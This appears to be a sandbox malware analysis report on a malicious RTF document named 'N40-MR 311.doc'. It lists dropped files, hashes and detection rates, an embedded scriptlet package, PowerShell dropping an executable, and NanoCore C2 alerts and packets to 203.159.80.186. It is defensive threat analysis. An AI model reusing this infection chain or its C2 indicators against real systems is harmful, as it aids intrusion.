Encrypted:	false
SSDEEP:	24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
MD5:	8FA8F52DFC55D341300EFF8E4C44BA33
SHA1:	4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
SHA-256:	2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
SHA-512:	A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 20%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\N40-MR 311.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Mon Aug 2 16:45:36 2021, length=234758, window=hide
Category:	dropped
Size (bytes):	2028
Entropy (8bit):	4.5469693016682875
Encrypted:	false
SSDEEP:	48:8Zs/XT0jqLYuL6sffY2Zs/XT0jqLYuL6sffc:8C/XojqLb1ffY2C/XojqLb1ffc
MD5:	A1CAC1C68B024261BD558935FD2F2189
SHA1:	0F96BCABBBAA1D7C055543B8AE91E2479740602E
SHA-256:	6E358DEAB655431DD01323FA204D4E096E5A85DC54198DD695F918091B59DCBD
SHA-512:	13370227B6CF5F38A3D4BC120A08F31811FEC39836FE2DDF47132D63A71F5F4BDA2BECD572836DB61ADBFF16B5D5B03D2466A2C536338891B0F5B8D0A361611A
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... .....l..{....l..{....H3................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2......S.. .N40-MR~1.DOC..J.......Q.y.Q.y...8.....................N.4.0.-.M.R. .3.1.1...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\N40-MR 311.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.4.0.-.M.R. .3.1.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......305090..........D_....3N...W...9G.C...........[D_....3N...W...9G.C..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	68
Entropy (8bit):	4.215441062081381
Encrypted:	false
SSDEEP:	3:M1FiqsZBCzzdsZBCmX1FiqsZBCv:MjeKhe7es
MD5:	416E8EF4E2923FBE5F7B41E407EF6625
SHA1:	8087A06A289C49E7BE9C24B06A6048201C61F89A
SHA-256:	4FF60B150F935E72A8B8F6EA6572D37CE53458F76E53C41E11F6C2F9201FC7A8
SHA-512:	B9230D32E4B60A032E2F681F3F5D4001FDD8C6B476B17E5C45C7A4A936C5E9918BDE7251DA714ADA0201E5CF9D1D5741729CDC910BBFA9EA6D9653EAAD7B4326
Malicious:	false
Reputation:	unknown
Preview:	[doc]..N40-MR 311.LNK=0..N40-MR 311.LNK=0..[doc]..N40-MR 311.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4311600611816426
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
MD5:	B1035D12CDF3CD7AA18A33C0A1D17AAE
SHA1:	CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
SHA-256:	CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
SHA-512:	E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
Malicious:	false
Reputation:	unknown
Preview:	.user..................................................A.l.b.u.s.............p.......................................P......................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	unknown
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1VEASXR02KDFZ3SNGYVE.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5827079829552315
Encrypted:	false
SSDEEP:	96:chQCEMq5qvsqvJCwolz8hQCEMq5qvsEHyqvJCwor/zUkbYSHyyByC/kblUVrIu:caUolz8aAHnor/zZeur8YIu
MD5:	1028311E6755CE2D1D2C579501F0F934
SHA1:	B938F501720E094DA85B688C225182435542DB51
SHA-256:	151FCF58167D671ECDC59EDF893DDB377F0D7B3BEBDA5FC7A58BF42926BD3BCC
SHA-512:	C26DFEC968486489D86985E327672AEA233E0D57ECA10FD92C2D462896228055F7AAD89E42EFA43FF060662AD03ACF687186CD3662F68F6E434AAFEFAB87A7EF
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5827079829552315
Encrypted:	false
SSDEEP:	96:chQCEMq5qvsqvJCwolz8hQCEMq5qvsEHyqvJCwor/zUkbYSHyyByC/kblUVrIu:caUolz8aAHnor/zZeur8YIu
MD5:	1028311E6755CE2D1D2C579501F0F934
SHA1:	B938F501720E094DA85B688C225182435542DB51
SHA-256:	151FCF58167D671ECDC59EDF893DDB377F0D7B3BEBDA5FC7A58BF42926BD3BCC
SHA-512:	C26DFEC968486489D86985E327672AEA233E0D57ECA10FD92C2D462896228055F7AAD89E42EFA43FF060662AD03ACF687186CD3662F68F6E434AAFEFAB87A7EF
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msge (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5827079829552315
Encrypted:	false
SSDEEP:	96:chQCEMq5qvsqvJCwolz8hQCEMq5qvsEHyqvJCwor/zUkbYSHyyByC/kblUVrIu:caUolz8aAHnor/zZeur8YIu
MD5:	1028311E6755CE2D1D2C579501F0F934
SHA1:	B938F501720E094DA85B688C225182435542DB51
SHA-256:	151FCF58167D671ECDC59EDF893DDB377F0D7B3BEBDA5FC7A58BF42926BD3BCC
SHA-512:	C26DFEC968486489D86985E327672AEA233E0D57ECA10FD92C2D462896228055F7AAD89E42EFA43FF060662AD03ACF687186CD3662F68F6E434AAFEFAB87A7EF
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H5EJSFXE9ELAVWZXKJFX.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5827079829552315
Encrypted:	false
SSDEEP:	96:chQCEMq5qvsqvJCwolz8hQCEMq5qvsEHyqvJCwor/zUkbYSHyyByC/kblUVrIu:caUolz8aAHnor/zZeur8YIu
MD5:	1028311E6755CE2D1D2C579501F0F934
SHA1:	B938F501720E094DA85B688C225182435542DB51
SHA-256:	151FCF58167D671ECDC59EDF893DDB377F0D7B3BEBDA5FC7A58BF42926BD3BCC
SHA-512:	C26DFEC968486489D86985E327672AEA233E0D57ECA10FD92C2D462896228055F7AAD89E42EFA43FF060662AD03ACF687186CD3662F68F6E434AAFEFAB87A7EF
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T04FZ82OXFDJU1HR5Q1R.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5827079829552315
Encrypted:	false
SSDEEP:	96:chQCEMq5qvsqvJCwolz8hQCEMq5qvsEHyqvJCwor/zUkbYSHyyByC/kblUVrIu:caUolz8aAHnor/zZeur8YIu
MD5:	1028311E6755CE2D1D2C579501F0F934
SHA1:	B938F501720E094DA85B688C225182435542DB51
SHA-256:	151FCF58167D671ECDC59EDF893DDB377F0D7B3BEBDA5FC7A58BF42926BD3BCC
SHA-512:	C26DFEC968486489D86985E327672AEA233E0D57ECA10FD92C2D462896228055F7AAD89E42EFA43FF060662AD03ACF687186CD3662F68F6E434AAFEFAB87A7EF
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\microA.exe Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	525312
Entropy (8bit):	6.318909143915524
Encrypted:	false
SSDEEP:	12288:n02Xq6JYELsqsEXQ3MXw7vy/CdBJpS6R6jH24wqcHf7a:J3jscXQcXGjdS6R6jHsqr
MD5:	100C3E2649FD32CE6D7E108E1A2EBF0D
SHA1:	7F6C8FAB6FA84AD9F12D4CF08CB684D525073230
SHA-256:	29A4C97029DCF52E73BB65D748D1FD6194C5F7F72FE8C272320BBE38636E0F3A
SHA-512:	96570F3A334448CCE354A784C3F9D43594A21329D2784DC459B6CC27AABA6B5132FA2D0A4B889CBDAA75394CF1C6C1BEBCD5EE694F7F0528A398665C611BF936
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 40%, Browse Antivirus: ReversingLabs, Detection: 63%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.....................2........... ........@.. .......................`............@.....................................W......../...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc..../.......0..................@..@.reloc.......@......................@..B........................H............!...........@..$............................................0.............-.&(....+.&+.....0..........s....(....t.....-.&+......+.....~......0...........(.......,.&&.(....o.....-.&&+.}....+.}....+.......0...........{.....-)&.E........2...M...o...................+..+.....,.&&. ..y.-.&&..}.....+.}....+.}....+...}..... ...}......}.......}......{.... ...Na}......}.......}..... ..5.}......}.......}......{.... I.7a}......}.......}..... A.D.}......}.....*.

C:\Users\user\Desktop\~$0-MR 311.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4311600611816426
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
MD5:	B1035D12CDF3CD7AA18A33C0A1D17AAE
SHA1:	CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
SHA-256:	CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
SHA-512:	E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
Malicious:	false
Reputation:	unknown
Preview:	.user..................................................A.l.b.u.s.............p.......................................P......................z...............x...

C:\Windows\System32\rfxvmt.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\images.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	3.168284160820565
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	N40-MR 311.doc
File size:	234758
MD5:	0284c94401a743d97b9cca52ac790864
SHA1:	fc3a473b80e9f717a68c54374aadc016cfe0d9ed
SHA256:	433fef750a44d6d44ebc9acf291ae3ad5812531d8aba3bdf543d44dcff943694
SHA512:	60a70b19910e58435487a8706953dc0f5d3d6f4e60e8adf1a7358a81e897219827c32c33baae6e835e028b1663a725f9fd51015c818eaa73b1db9268759f9c6a
SSDEEP:	1536:ixW7qA4b64MVTDuhrNnlwrrmRooRBOEIRnxu93duu7dzFz76mAg5eeVhMDw5wfLT:ixW7qA4b64Mw7667dzFtr5RDAw5wfv
File Content Preview:	{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000961h	2	embedded	package	20582	abdtfhgXgdghgh.ScT	C:\jsdsTggf\abdtfhgXGdghgh.ScT	C:\CbkepaDw\abdtfhghgdghgh.ScT	no
1	0000B190h	2	embedded	OLE2LInk	2560				no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/02/21-10:47:22.901655	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49169	8234	192.168.2.22	203.159.80.186
08/02/21-10:47:29.025817	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49170	8234	192.168.2.22	203.159.80.186
08/02/21-10:47:34.516088	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49171	8234	192.168.2.22	203.159.80.186
08/02/21-10:47:42.118394	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49172	8234	192.168.2.22	203.159.80.186
08/02/21-10:47:47.369584	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49173	8234	192.168.2.22	203.159.80.186

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 10:45:33.124341011 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.157356977 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.157465935 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.158689976 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.238982916 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.239016056 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.239027977 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.239039898 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.239171028 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.280036926 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.280066967 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.280080080 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.280091047 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.280102968 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.280114889 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.280127048 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.280142069 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.280316114 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.308758974 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.308789968 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.308803082 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.308815002 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.308826923 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.308839083 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.308851957 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.308868885 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.308885098 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.308902025 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.308917999 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.308929920 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.308970928 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.309019089 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.309026957 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.310575008 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.338120937 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338150024 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338161945 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338175058 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338191986 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338207960 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338224888 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338239908 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338258982 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338274002 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.338277102 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338291883 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338294029 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.338299990 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.338309050 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338320017 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.338325024 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338340044 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338340998 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.338356018 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338371038 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338381052 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.338390112 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338407040 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338421106 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338430882 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.338437080 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338443041 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.338453054 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.338459969 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.338473082 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.338488102 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.340141058 CEST	49165	80	192.168.2.22	203.159.80.186
Aug 2, 2021 10:45:33.367360115 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367393017 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367403984 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367417097 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367433071 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367444038 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367455959 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367472887 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367489100 CEST	80	49165	203.159.80.186	192.168.2.22
Aug 2, 2021 10:45:33.367505074 CEST	80	49165	203.159.80.186	192.168.2.22
